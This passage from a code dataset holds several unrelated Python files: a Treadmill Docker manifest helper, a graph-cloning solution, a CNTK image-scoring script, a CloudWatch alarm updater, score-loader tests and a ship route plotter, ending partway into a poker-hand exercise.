{source}:{dest}:{mode}'.format(\n            source=volume[0],\n            dest=volume[1],\n            mode=volume[2]\n        )\n\n    if uidgid is not None:\n        tpl += ' --user {uidgid}'.format(uidgid=uidgid)\n\n    if command is not None:\n        tpl += ' -- {cmd}'\n\n    return tpl.format(\n        tm=dist.TREADMILL_BIN,\n        unique_id=unique_id,\n        image=image,\n        cmd=command,\n    )\n\n\ndef _transform_services(manifest):\n    \"\"\"Adds linux runtime specific details to the manifest.\"\"\"\n    # Normalize restart count\n    manifest['services'] = [\n        {\n            'name': service['name'],\n            'command': _generate_command(\n                service['command'],\n                service['name'],\n            ),\n            'restart': {\n                'limit': int(service['restart']['limit']),\n                'interval': int(service['restart']['interval']),\n            },\n            'root': service.get('root', False),\n            'proid': (\n                'root' if service.get('root', False)\n                else manifest['proid']\n            ),\n            'environ': manifest['environ'],\n            'config': None,\n            'downed': False,\n            'trace': True,\n        }\n        for service in manifest.get('services', [])\n    ]\n\n\ndef _get_docker_registry(_tm_env):\n    # TODO get registry from cell_config.yml\n    return 'lab-repo.msdev.ms.com:5000'\n\n\ndef _add_dockerd_services(manifest, tm_env):\n    \"\"\"Configure docker daemon services.\"\"\"\n    # add dockerd service\n    (_uid, proid_gid) = _get_user_uid_gid(manifest['proid'])\n    dockerd_svc = {\n        'name': 'dockerd',\n        'proid': 'root',\n        'restart': {\n            'limit': 5,\n            'interval': 60,\n        },\n        'command': (\n            'exec {dockerd} --add-runtime docker-runc={docker_runtime}'\n            ' --default-runtime=docker-runc'\n            ' --exec-opt native.cgroupdriver=cgroupfs --bridge=none'\n            ' --ip-forward=false --ip-masq=false --iptables=false'\n            ' --cgroup-parent=/docker -G {gid}'\n            ' --insecure-registry {registry} --add-registry {registry}'\n        ).format(\n            dockerd=subproc.resolve('dockerd'),\n            docker_runtime=subproc.resolve('docker_runtime'),\n            gid=proid_gid,\n            registry=_get_docker_registry(tm_env)\n        ),\n        'root': True,\n        'environ': [],\n        'config': None,\n        'downed': False,\n        'trace': False,\n    }\n    manifest['services'].append(dockerd_svc)\n\n\ndef _get_user_uid_gid(username):\n    user_pw = pwd.getpwnam(username)\n    return (user_pw.pw_uid, user_pw.pw_gid)\n","sub_path":"lib/python/treadmill/runtime/docker2/_manifest.py","file_name":"_manifest.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"234003518","text":"class UndirectedGraphNode:\n    def __init__(self, x):\n        self.label = x\n        self.neighbors = []\n\nclass Solution:\n    # @param node, an undirected graph node\n    # @return an undirected graph node\n    def clone(self, node, visited=None):\n        # recursive DFS clone: visited maps each original node to its copy\n        if visited is None:\n            visited = {}\n        if node in visited:\n            return visited[node]\n        newNode = UndirectedGraphNode(node.label)\n        visited[node] = newNode\n        for neighbor in node.neighbors:\n            newNode.neighbors.append(self.clone(neighbor, visited))\n        return newNode\n\n    def cloneGraph(self, node):\n        # iterative BFS clone: visited maps each original node to its copy\n        if not node:\n            return node\n        root = UndirectedGraphNode(node.label)\n        visited = {node: root}\n        queue = [node]\n        while queue:\n            cur = queue.pop()\n            for neighbor in cur.neighbors:\n                if neighbor not in visited:\n                    visited[neighbor] = UndirectedGraphNode(neighbor.label)\n                    queue.insert(0, neighbor)\n                visited[cur].neighbors.append(visited[neighbor])\n        return root\n","sub_path":"LeetCode/rewrite/cloneGraph.py","file_name":"cloneGraph.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"60319021","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport importlib\nimport random\nimport json\nimport cv2\nimport numpy as np\nfrom helpers_cntk import *\nfrom PARAMETERSall import modelDir_1, modelDir_2, cntk_nrRois_1, cntk_nrRois_2, getCntkInputs, applyNonMaximaSuppression, nmsThreshold, get_grid_rois_inbox, train_posOverlapThres, nrClasses_1, scoreRois, classes_1, vis_decisionThresholds, nrClasses_2, classes_2\nfrom SLIDINGWINDOWPARAMS import generate_rois, get_grid_rois, imH, imW, stepsize, rectangles, ratios, stepsize_ratio, small_rectangles\nfrom helpers import imread\nimport logging\n\nlogging.basicConfig(\n    format='%(asctime)s %(levelname)s - %(message)s', level=logging.DEBUG)\n\nfrom PIL import Image, ImageChops, ImageOps\n\n\ndef makeThumb(f_in, size=(80, 80)):\n    image = Image.open(f_in)\n    offset_x = max(image.size[0] - image.size[1], 0)\n    offset_y = max(image.size[1] - image.size[0], 0)\n    crop = image.crop((int(offset_x / 2), int(offset_y / 2),\n                       image.size[0] - int(offset_x / 2), image.size[1] - int(offset_y / 2)))\n    print((int(offset_x / 2), int(offset_y / 2),\n           size[0] - int(offset_x / 2), size[1] - int(offset_y / 2)), offset_x, offset_y)\n    crop_size = crop.size\n    crop = crop.resize(size, Image.ANTIALIAS)\n    crop.save('test.jpg')\n    print(offset_x, offset_y, crop.size, image.size)\n    return crop, offset_x, offset_y, image.size, crop_size\n\n\ndef score_one_image(imgPath, model_1, model_2):\n    # choose which classifier to use\n\n    # no need to change these parameters\n    boAddSelectiveSearchROIs = True\n    boAddGridROIs = True\n    boFilterROIs = True\n    boUseNonMaximaSurpression = True\n\n    print(\"reading image...\")\n    pil_image, offset_x, offset_y, original_size, crop_size = makeThumb(\n        imgPath, (imH, imW))\n    print(original_size, crop_size, offset_x, offset_y)\n    img = cv2.cvtColor(np.array(pil_image), cv2.COLOR_RGB2BGR)\n    cv2.imwrite('test2.jpg', img)\n    # compute ROIs\n    gridRois_1 = get_grid_rois(imW, imH, stepsize / 2, rectangles)\n    if len(gridRois_1) >= cntk_nrRois_1:\n        gridRois_1 = gridRois_1[:cntk_nrRois_1]\n    else:\n        gridRois_1 = gridRois_1 + [[0, 0, 1, 1]] * \\\n            (cntk_nrRois_1 - len(gridRois_1))\n\n    print(\"prepare DNN inputs...\")\n    # prepare DNN inputs\n    _, _, roisCntk_1 = getCntkInputs(\n        'test2.jpg', gridRois_1, None, train_posOverlapThres, nrClasses_1, cntk_nrRois_1, imW, imH)\n    arguments_1 = {\n        # convert to CNTK's CHW format\n        model_1.arguments[0]: [np.ascontiguousarray(np.array(img, dtype=np.float32).transpose(2, 0, 1))],\n        model_1.arguments[1]: [np.array(roisCntk_1, np.float32)]\n    }\n\n    print(\"run DNN model...\")\n    # run DNN model\n    dnnOutputs_1 = model_1.eval(arguments_1)[0][0]\n    dnnOutputs_1 = dnnOutputs_1[:len(gridRois_1)]\n\n    print(\"score all ROIs...\")\n    # 
score all ROIs\n labels_1, scores_1 = scoreRois(classifier, dnnOutputs_1, 1, 1, 1, len(classes_1),\n decisionThreshold=vis_decisionThresholds[classifier])\n\n print(\"perform non-maxima surpression...\")\n # perform non-maxima surpression\n nmsKeepIndices_1 = []\n if boUseNonMaximaSurpression:\n nmsKeepIndices_1 = applyNonMaximaSuppression(\n nmsThreshold, labels_1, scores_1, gridRois_1)\n\n # NMS transfer\n transfer_index = [x for x in nmsKeepIndices_1 if labels_1[x] > 0]\n transfer_boxes = [gridRois_1[x] for x in transfer_index]\n\n # compute ROIs\n if len(transfer_boxes) > 0:\n gridRois_2 = get_grid_rois_inbox(\n transfer_boxes, ratios, stepsize_ratio / 2, imW, imH)\n else:\n gridRois_2 = get_grid_rois(imW, imH, stepsize / 2, small_rectangles)\n if len(gridRois_2) >= cntk_nrRois_2:\n gridRois_2 = gridRois_2[:cntk_nrRois_2]\n else:\n gridRois_2 = gridRois_2 + [[0, 0, 1, 1]] * \\\n (cntk_nrRois_2 - len(gridRois_2))\n\n print(\"prepare DNN inputs...\")\n # prepare DNN inputs\n _, _, roisCntk_2 = getCntkInputs(\n 'test2.jpg', gridRois_2, None, train_posOverlapThres, nrClasses_2, cntk_nrRois_2, imW, imH)\n arguments_2 = {\n # convert to CNTK's HWC format\n model_2.arguments[0]: [np.ascontiguousarray(np.array(img, dtype=np.float32).transpose(2, 0, 1))],\n model_2.arguments[1]: [np.array(roisCntk_2, np.float32)]\n }\n\n print(\"run DNN model...\")\n # run DNN model\n dnnOutputs_2 = model_2.eval(arguments_2)[0][0]\n dnnOutputs_2 = dnnOutputs_2[:len(gridRois_2)]\n\n print(\"score all ROIs...\")\n # score all ROIs\n labels_2, scores_2 = scoreRois(classifier, dnnOutputs_2, 1, 1, 1, len(classes_2),\n decisionThreshold=vis_decisionThresholds[classifier])\n\n print(\"perform non-maxima surpression...\")\n # perform non-maxima surpression\n nmsKeepIndices_2 = []\n if boUseNonMaximaSurpression:\n nmsKeepIndices_2 = applyNonMaximaSuppression(\n nmsThreshold, labels_2, scores_2, gridRois_2)\n\n outDict = []\n for l, s, r in zip(labels_2, scores_2, gridRois_2):\n # create json-encoded string of all detections\n if l == 1:\n a = 1\n x_min = (r[0] * float(crop_size[0]) / float(imW) +\n offset_x / 2) / original_size[0]\n x_max = (r[2] * float(crop_size[0]) / float(imW) +\n offset_x / 2) / original_size[0]\n y_min = (r[1] * float(crop_size[1]) / float(imH) +\n offset_y / 2) / original_size[1]\n y_max = (r[3] * float(crop_size[1]) / float(imH) +\n offset_y / 2) / original_size[1]\n outDict.append({\"ItemName\": str(l), \"Score\": np.asscalar(s), \"nms\": False,\n \"Xmin\": x_min, \"Ymin\": y_min, \"Xmax\": x_max, \"Ymax\": y_max})\n for i in nmsKeepIndices_2:\n outDict[i][\"nms\"] = True\n\n output = []\n for obj in outDict:\n if obj['ItemName'] == '0' or obj['nms'] == False:\n continue\n output.append(obj)\n return output\n\n\n####################################\n# Main\n####################################\n\nif __name__ == '__main__':\n ####################################\n # Parameters\n ####################################\n classifier = 'nn'\n model_path_1 = os.path.join(modelDir_1, \"frcn_\" + classifier + \".model\")\n model_path_2 = os.path.join(modelDir_2, \"frcn_\" + classifier + \".model\")\n logging.debug(\"{} {}\".format(model_path_1, model_path_2))\n input_folder = os.environ['INPUT_FOLDER']\n output_folder = os.environ['OUTPUT_FOLDER']\n if 'AZ_BATCH_TASK_WORKING_DIR' in os.environ:\n input_folder = input_folder.replace('$AZ_BATCH_TASK_WORKING_DIR', os.environ[\n 'AZ_BATCH_TASK_WORKING_DIR'])\n output_folder = output_folder.replace('$AZ_BATCH_TASK_WORKING_DIR', os.environ[\n 
'AZ_BATCH_TASK_WORKING_DIR'])\n# load cntk model\n print(\"Loading DNN...\")\n model_1 = load_model(model_path_1)\n model_2 = load_model(model_path_2)\n\n # score all images in one folder\n print(\"scoring...\")\n imgs = os.listdir(input_folder)\n for im in imgs:\n print(im)\n im_path = os.path.join(input_folder, im)\n if os.path.isdir(im_path):\n continue\n result = score_one_image(im_path, model_1, model_2)\n out = os.path.join(output_folder, os.path.basename(\n im_path) + '.fscnn.json')\n logging.debug('Writing to {}'.format(out))\n with open(out, 'w') as f:\n json.dump(result, f)\n","sub_path":"6_scoreImage_together.py","file_name":"6_scoreImage_together.py","file_ext":"py","file_size_in_byte":7485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"403836640","text":"import click\n\nfrom bluecanary.managers import AlarmsManager, AWSCredentialsManager\nfrom bluecanary.plugins import load_plugins\nfrom bluecanary.set_cloudwatch_alarm import set_cloudwatch_alarm\nfrom bluecanary.tags import get_all_elb_tags\nfrom bluecanary.utilities import preserve_credentials_state\n\n\nplugin_alarms = load_plugins()\n\n\n@preserve_credentials_state\ndef update_elb_alarms(verbose=0):\n alarm_keys = AlarmsManager.get_alarm_keys()\n\n for alarm_key in alarm_keys:\n alarm_group = AlarmsManager.get_alarm_group(alarm_key)\n\n tag_key = alarm_group.get('TagKey')\n tag_value = alarm_group.get('TagValue')\n\n AWSCredentialsManager.load_saved_environment_state()\n if alarm_group.get('AWSProfile'):\n AWSCredentialsManager.load_aws_profile(alarm_group['AWSProfile'])\n\n elb_tags = get_all_elb_tags(tag_key)\n\n for elb_name, key in elb_tags.items():\n if key != alarm_key:\n continue\n\n if verbose:\n click.echo('\\nUpdating load balancer {} tagged with {}: {}'\n .format(elb_name, tag_key, tag_value))\n\n alarms = alarm_group.get('Alarms', [])\n for alarm in alarms:\n if verbose:\n click.echo('Updating {} alarm on load balancer {}'\n .format(alarm['MetricName'], elb_name))\n\n if alarm['MetricName'] in plugin_alarms:\n alarm = plugin_alarms.get(alarm['MetricName']).get_updated_alarm_kwargs(\n identifier=elb_name,\n **alarm\n )\n\n set_cloudwatch_alarm(elb_name, **alarm)\n","sub_path":"bluecanary/scripts/update_alarms/update_elb_alarms.py","file_name":"update_elb_alarms.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"450631032","text":"\nimport mock\n\nimport helpers\n\nhelpers.path_bodge()\n\nfrom proton_helper import ProtonHelper\n\ndef assert_load(data_to_load):\n mock_loader = mock.Mock()\n mock_loader.return_value = data_to_load\n ph = ProtonHelper(mock_loader)\n\n input_ = 'bacon'\n ph.load(input_)\n\n mock_loader.assert_called_once_with(input_)\n\n return ph\n\ndef test_load():\n loaded_data = {\n \"match_number\": 1,\n \"teams\": {\n \"TLA1\": {\n \"zone\": 0,\n },\n \"TLA2\": {\n \"zone\": 2,\n },\n }\n }\n\n assert_load(loaded_data)\n\ndef test_team_scoresheets():\n teams_data_complete = {\n \"TLA1\": {\n \"zone\": 0,\n \"bacon\": 4,\n \"present\": True,\n \"disqualified\": False,\n },\n \"TLA2\": {\n \"zone\": 2,\n \"bacon\": 13,\n \"present\": False,\n \"disqualified\": True,\n },\n }\n loaded_data = {\n \"match_number\": 1,\n \"teams\": {\n \"TLA1\": {\n \"zone\": 0,\n \"bacon\": 4,\n # defaults\n },\n \"TLA2\": {\n \"zone\": 2,\n \"bacon\": 13,\n \"present\": False,\n \"disqualified\": True,\n },\n },\n }\n\n ph = assert_load(loaded_data)\n\n 
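# the helper is expected to fill the omitted \"present\"/\"disqualified\" fields with their defaults (True / False), yielding the fully-populated dict above\n    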
team_scoresheets = ph.team_scoresheets\n\n assert team_scoresheets == teams_data_complete\n\ndef test_produce():\n input_ = {\n \"match_number\": 1,\n \"teams\": {\n \"TLA1\": {\n \"zone\": 0,\n },\n \"TLA2\": {\n \"zone\": 2,\n \"present\": False,\n \"disqualified\": True,\n },\n }\n }\n\n mock_loader = mock.Mock()\n mock_loader.return_value = input_\n ph = ProtonHelper(mock_loader)\n ph.load(None)\n\n scores = { \"TLA1\": 0, \"TLA2\": 13 }\n\n whole = ph.produce(scores)\n\n assert whole[\"version\"] == \"1.0.0\"\n assert whole[\"match_number\"] == 1\n assert whole[\"scores\"] == {\n \"TLA1\": helpers.tla_result_fixture(0, 0),\n \"TLA2\": {\n \"score\": 13,\n \"zone\": 2,\n # while not sane these are expected to be pass-through\n \"present\": False,\n \"disqualified\": True,\n },\n }\n","sub_path":"test/proton_helper_test.py","file_name":"proton_helper_test.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"385278711","text":"import evaluation\nimport folium\nimport main\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport weather\nimport os\nimport pickle\n\nfrom matplotlib import cm, patches\nfrom matplotlib.collections import PatchCollection\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom pathlib import Path\n\n\ndef plot_stats(path_logs, name):\n for path_log in path_logs.values():\n for sub_path_log in path_log.values():\n _gen = sub_path_log.select(\"gen\")\n fit_mins = sub_path_log.chapters[\"fitness\"].select(\"min\")\n size_avgs = sub_path_log.chapters[\"size\"].select(\"avg\")\n\n fig, ax1 = plt.subplots()\n fig.suptitle(name)\n line1 = ax1.save_fronts(_gen, fit_mins, \"b-\", label=\"Minimum Fitness\")\n ax1.set_xlabel(\"Generation\")\n ax1.set_ylabel(\"Fitness\", color=\"b\")\n for tl in ax1.get_yticklabels():\n tl.set_color(\"b\")\n\n ax2 = ax1.twinx()\n line2 = ax2.save_fronts(_gen, size_avgs, \"r-\", label=\"Average Size\")\n ax2.set_ylabel(\"Size\", color=\"r\")\n for tl in ax2.get_yticklabels():\n tl.set_color(\"r\")\n\n lines = line1 + line2\n labs = [line.get_label() for line in lines]\n ax1.legend(lines, labs, loc=\"center right\")\n print('{} - final avg size'.format(name), size_avgs[-1])\n\n\nclass RoutePlotter:\n def __init__(self, bounds, n_plots, vessel=None, titles=None, ecas=None, show_colorbar=True, uin=None, vin=None,\n lons=None, lats=None, DIR=Path('D:/')):\n self.DIR = DIR\n self.col_map = cm.rainbow\n if titles:\n self.titles = titles\n else:\n self.titles = ['no_title'] * n_plots\n\n self.ecas = ecas\n self.show_colorbar = show_colorbar\n self.n_plots = n_plots\n\n if vessel:\n self.vessel = vessel\n else:\n self.vessel = evaluation.Vessel()\n\n if uin is not None:\n self.uin = uin\n self.vin = vin\n self.lons = lons\n self.lats = lats\n self.plot_currents = True\n else:\n self.uin = self.vin = self.lons = self.lats = None\n self.plot_currents = False\n\n # Set extent\n minx, miny, maxx, maxy = bounds\n margin = 2\n self.lef = max(minx - margin, -180)\n self.rig = min(maxx + margin, 180)\n self.bot = max(miny - margin, -90)\n self.top = min(maxy + margin, 90)\n\n self.rows = int(round(math.sqrt(n_plots)))\n self.columns = int(math.ceil(math.sqrt(n_plots)))\n\n def plot_routes(self, results_files, best_inds_files):\n fig = plt.figure()\n fig.suptitle('Routes', fontsize=12)\n\n r_iter = iter([r for ro in range(self.rows) for r in [ro] * self.columns])\n c_iter = 
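# The proton_helper tests above revolve around one pattern: inject a mock.Mock as the loader,
# call load(), then assert the mock was invoked exactly once with the original argument. A
# self-contained illustration of that pattern (ProtonHelper itself is not in this record, so a
# stand-in class is used; `mock` here is the stdlib unittest.mock rather than the older backport):
from unittest import mock

class Helper:
    def __init__(self, loader):
        self._loader = loader

    def load(self, source):
        self.data = self._loader(source)

loader = mock.Mock(return_value={"match_number": 1, "teams": {}})
helper = Helper(loader)
helper.load("bacon")
loader.assert_called_once_with("bacon")   # fails if load() bypassed the injected loader
assert helper.data["match_number"] == 1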
iter(list(range(self.columns)) * self.rows)\n for i, result in enumerate(results_files):\n r, c = next(r_iter), next(c_iter)\n\n shortest_paths = result['initialRoutes']\n individuals = best_inds_files[i]\n\n ax = plt.subplot2grid((self.rows, self.columns), (r, c))\n ax.set_title(\"{}\".format(self.titles[i]), fontsize=10)\n m = Basemap(projection='merc', resolution='c', llcrnrlat=self.bot, urcrnrlat=self.top, llcrnrlon=self.lef,\n urcrnrlon=self.rig, ax=ax)\n m.drawparallels(np.arange(-90., 90., 10.), labels=[1, 0, 0, 0], fontsize=8)\n m.drawmeridians(np.arange(-180., 180., 10.), labels=[0, 0, 0, 1], fontsize=8)\n m.drawmapboundary(color='black', fill_color='aqua')\n m.fillcontinents(color='lightgray', lake_color='lightgray', zorder=2)\n m.readshapefile(self.DIR / 'data/bathymetry_200m/ne_10m_bathymetry_K_200', 'ne_10m_bathymetry_K_200',\n drawbounds=False)\n\n ps = [patches.Polygon(np.array(shape), True) for shape in m.ne_10m_bathymetry_K_200]\n ax.add_collection(PatchCollection(ps, facecolor='white', zorder=2))\n\n # Plot initial routes\n for p in shortest_paths.values():\n for sp in p['path'].values():\n for shortest_path in sp.values():\n waypoints = [item[0] for item in shortest_path]\n edges = zip(waypoints[:-1], waypoints[1:])\n for e in edges:\n m.drawgreatcircle(e[0][0], e[0][1], e[1][0], e[1][1], linewidth=2, color='black', zorder=3)\n\n # Plot individuals\n for p in individuals.values():\n for sp in p.values():\n for ind in sp:\n # Create colors\n true_speeds = [item[1] for item in ind[:-1]]\n normalized_speeds = [(speed - min(self.vessel.speeds)) / (\n max(self.vessel.speeds) - min(self.vessel.speeds)) for speed in true_speeds] + [0]\n\n # Plot edges\n waypoints = [item[0] for item in ind]\n edges = zip(waypoints[:-1], waypoints[1:])\n for j, e in enumerate(edges):\n m.drawgreatcircle(e[0][0], e[0][1], e[1][0], e[1][1], linewidth=2,\n color=self.col_map(normalized_speeds[j]), zorder=3)\n for j, (x, y) in enumerate(waypoints):\n m.scatter(x, y, latlon=True, color='dimgray', marker='o', s=5, zorder=4)\n\n if self.plot_currents:\n # Transform vector and coordinate data\n vec_lon = int(self.uin.shape[1] / (2 * 360 / (self.rig - self.lef)))\n vec_lat = int(self.uin.shape[0] / (2 * 180 / (self.top - self.bot)))\n u_rot, v_rot, x, y = m.transform_vector(self.uin, self.vin, self.lons, self.lats, vec_lon, vec_lat,\n returnxy=True)\n\n vec_plot = m.quiver(x, y, u_rot, v_rot, color='gray', scale=50, width=.002)\n plt.quiverkey(vec_plot, 0.2, -0.2, 1, '1 knot', labelpos='W') # Position and reference label\n\n if self.ecas:\n for eca in self.ecas:\n lon, lat = eca.exterior.xy\n x, y = m(lon, lat)\n m.plot(x, y, 'o-', markersize=2, linewidth=1)\n\n if self.show_colorbar:\n # Create color bar\n sm = plt.cm.ScalarMappable(cmap=self.col_map)\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n col_bar = plt.colorbar(sm,\n norm=plt.Normalize(vmin=min(self.vessel.speeds), vmax=max(self.vessel.speeds)),\n cax=cax)\n min_s, max_s = min(self.vessel.speeds), max(self.vessel.speeds)\n # noinspection PyProtectedMember\n col_bar._ax.set_yticklabels(\n ['%.1f' % round(min_s, 1), '%.1f' % round((1 / 5) * (max_s - min_s) + min_s, 1),\n '%.1f' % round((2 / 5) * (max_s - min_s) + min_s, 1),\n '%.1f' % round((3 / 5) * (max_s - min_s) + min_s, 1),\n '%.1f' % round((4 / 5) * (max_s - min_s) + min_s, 1), '%.1f' % round(max_s, 1)], fontsize=8)\n col_bar.set_label('Calm water speed [kn]', rotation=270, labelpad=15, fontsize=10)\n\n\ndef plot_fronts(front):\n # Plot 
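# plot_routes above colors each route edge by calm-water speed: the speeds are min-max scaled
# into [0, 1] and fed to the rainbow colormap, and the same scaling later drives the colorbar
# tick labels. The core mapping in isolation (the speed values here are made-up examples):
import numpy as np
from matplotlib import cm

speeds = np.array([8.0, 10.5, 12.0, 15.0])    # assumed vessel speeds in knots
lo, hi = speeds.min(), speeds.max()
normalized = (speeds - lo) / (hi - lo)        # 0.0 -> slowest, 1.0 -> fastest
edge_colors = cm.rainbow(normalized)          # one RGBA row per edge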
fronts\n front = np.array([_ind.fitness.values for _ind in front])\n\n ax = plt.subplot2grid((max_sp, n_p), (sp_key, _p))\n ax.scatter(front[:, 0], front[:, 1], c=\"b\", s=1)\n ax.set_title('P{} - SP{}'.format(_p, sp_key))\n ax.axis(\"tight\")\n ax.grid()\n ax.set_xlabel('Travel time [d]')\n ax.set_ylabel(r'Fuel cost [USD, $\\times 1000$]')\n\n\ndef plot_interactive_route(path, path_key, obj_key):\n wps = [el[0] for el in path]\n start_point, end_point = wps[0], wps[-1]\n\n # Plot of the path using folium\n geo_path = np.asarray(wps)\n geo_path[:, [0, 1]] = geo_path[:, [1, 0]] # swap columns\n geo_map = folium.Map([0, 0], zoom_start=2)\n for point in geo_path:\n folium.Marker(point, popup=str(point)).add_to(geo_map)\n folium.PolyLine(geo_path).add_to(geo_map)\n\n # Add a Mark on the start and positions in a different color\n folium.Marker(geo_path[0], popup=str(start_point), icon=folium.Icon(color='red')).add_to(geo_map)\n folium.Marker(geo_path[-1], popup=str(end_point), icon=folium.Icon(color='red')).add_to(geo_map)\n\n # Save the interactive plot as a map\n output_name = 'output/example_path_{}_obj_{}_plot.html'.format(path_key, obj_key)\n geo_map.save(output_name)\n print('Output saved to: {}'.format(output_name))\n\n\nif __name__ == \"__main__\":\n os.chdir('..')\n _ID_dict = {'Cruisje naar Sydney': '22_09_26'}\n\n # _start_date = datetime.datetime(2016, 1, 1)\n _start_date = None\n planner = main.RoutePlanner()\n\n DIR = Path('D:/')\n\n with open(DIR / 'data/seca_areas_csv', 'rb') as file:\n _ecas = pickle.load(file)\n\n # Get outer bounds of all paths\n _minx, _miny, _maxx, _maxy = 180, 90, -180, -90\n for file_id in _ID_dict.values():\n with open('output/result/{}'.format(file_id), 'rb') as f:\n _result = pickle.load(f)\n\n for _p in _result['fronts'].values():\n for _front in _p.values():\n # Get outer bounds of paths\n _wps = np.asarray([row[0] for ind in _front for row in ind])\n minx_i, miny_i = np.amin(_wps, axis=0)\n maxx_i, maxy_i = np.amax(_wps, axis=0)\n _minx, _miny = min(minx_i, _minx), min(miny_i, _miny)\n _maxx, _maxy = max(maxx_i, _maxx), max(maxy_i, _maxy)\n\n _bounds = (_minx, _miny, _maxx, _maxy)\n\n plotter = RoutePlotter(bounds=_bounds, n_plots=len(_ID_dict), titles=list(_ID_dict.keys()), ecas=_ecas,\n vessel=planner.vessel)\n\n all_results, all_best_inds = [], []\n # Inspect best individuals for every ID dict key\n for f_idx, f_title in enumerate(_ID_dict.keys()):\n with open('output/result/{}'.format(_ID_dict[f_title]), 'rb') as f:\n _result = pickle.load(f)\n\n # Initialize pareto_fig\n pareto_fig, axs = plt.subplots(squeeze=False)\n pareto_fig.suptitle(f_title)\n\n n_p = len(_result['fronts'])\n max_sp = max([len(_result['fronts'][p]) for p in _result['fronts']])\n\n # Get best individuals in front\n best_inds = {}\n max_days = 0\n for _p, p_val in _result['fronts'].items():\n best_inds[_p] = {'fuel': [], 'time': [], 'fit': []}\n for sp_key, _front in p_val.items():\n # Get min time, min fuel and min fitness individuals\n fit_values = np.asarray([_ind.fitness.values for _ind in _front])\n\n time_ind = _front[np.argmin(fit_values[:, 0])]\n fuel_ind = _front[np.argmin(fit_values[:, 1])]\n fit_ind = _front[0]\n\n best_inds[_p]['fuel'].append(fuel_ind)\n best_inds[_p]['time'].append(time_ind)\n best_inds[_p]['fit'].append(fit_ind)\n\n # Get max days\n max_days = math.ceil(max(max_days, max(\n [fuel_ind.fitness.values[0], time_ind.fitness.values[0], fit_ind.fitness.values[0]])))\n\n # Plot fronts\n plot_fronts(_front)\n\n print('n_days:', max_days)\n\n if 
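# plot_interactive_route above swaps the (lon, lat) waypoint columns into folium's (lat, lon)
# order, drops a Marker per waypoint, joins them with a PolyLine and recolors the endpoints red.
# The same recipe standalone, with made-up coordinates instead of a decoded individual:
import folium

waypoints = [(51.9, 4.4), (49.3, -5.0), (40.6, -73.9)]       # (lat, lon) pairs
geo_map = folium.Map(location=waypoints[0], zoom_start=3)
for point in waypoints:
    folium.Marker(point, popup=str(point)).add_to(geo_map)
folium.PolyLine(waypoints).add_to(geo_map)
folium.Marker(waypoints[0], icon=folium.Icon(color='red')).add_to(geo_map)    # start
folium.Marker(waypoints[-1], icon=folium.Icon(color='red')).add_to(geo_map)   # end
geo_map.save('route.html')                                   # open in any browser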
_start_date:\n planner.evaluator.currentOp = weather.CurrentOperator(_start_date, max_days)\n\n for _p, _path in best_inds.items():\n for _k, _ind_list in _path.items():\n total_fit = total_original_fit = np.zeros(2)\n for _ind in _ind_list:\n plot_interactive_route(_ind, _p, _k)\n fit = np.array(planner.tb.evaluate(_ind))\n original_fit = np.array(_ind.fitness.values)\n total_fit += fit\n total_original_fit += original_fit\n\n file_key = list(_ID_dict.keys())[f_idx]\n print('File {} Path {} Obj {:>4} real'.format(file_key, _p, _k), np.round(total_fit,\n 2)) # print('File {} Path\n # {} Obj {:>4} orig'.format(file_key, _p, _k), np.round(total_original_fit, 2)) # print('DIFF\n # ORIGINAL: {}'.format(np.subtract(_ind.fitness.values, fit)))\n\n all_results.append(_result)\n all_best_inds.append(best_inds)\n\n plotter.plot_routes(all_results, all_best_inds)\n\n for f_idx, f_title in enumerate(_ID_dict.keys()):\n with open('output/result/{}'.format(_ID_dict[f_title]), 'rb') as f:\n _result = pickle.load(f)\n\n plot_stats(_result['logs'], f_title)\n plt.show()\n","sub_path":"analysis/inspection.py","file_name":"inspection.py","file_ext":"py","file_size_in_byte":13058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"198549248","text":"\"\"\"\r\n\n\nIn this challenge, you have to establish which kind of Poker combination is\npresent in a deck of five cards. Every card is a string containing the card\nvalue (with the upper-case initial for face-cards) and the lower-case initial\nfor suits, as in the examples below:\n\n \"Ah\" ➞ Ace of hearts\n \"Ks\" ➞ King of spades\n \"3d\" ➞ Three of diamonds\n \"Qc\" ➞ Queen of clubs\n\nThere are 10 different combinations. Here's the list, in decreasing order of\nimportance:\n\nName| Description \n---|--- \n **Royal Flush**| A, K, Q, J, 10, all with the same suit. \n **Straight Flush**| Five cards in sequence, all with the same suit. \n **Four of a Kind**| Four cards of the same rank. \n **Full House**| Three of a Kind with a Pair. \n **Flush**| Any five cards of the same suit, not in sequence. \n **Straight**| Five cards in a sequence, but not of the same suit. \n **Three of a Kind**| Three cards of the same rank. \n **Two Pair**| Two different Pair. \n **Pair**| Two cards of the same rank. \n **High Card**| No other valid combination. 
